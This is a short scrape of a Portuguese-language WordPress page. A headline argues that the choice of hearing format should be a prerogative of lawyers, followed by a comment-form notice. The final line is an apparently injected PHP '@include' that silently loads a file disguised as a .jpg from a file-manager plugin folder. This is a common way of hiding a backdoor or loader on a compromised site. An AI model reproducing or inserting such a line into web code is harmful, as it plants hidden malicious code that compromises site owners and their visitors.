A escolha do formato da audiência deve ser uma prerrogativa da advocacia, a fim de resguardar, se necessário for, a incomunicabilidade das partes e a sua autonomia para decidir

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";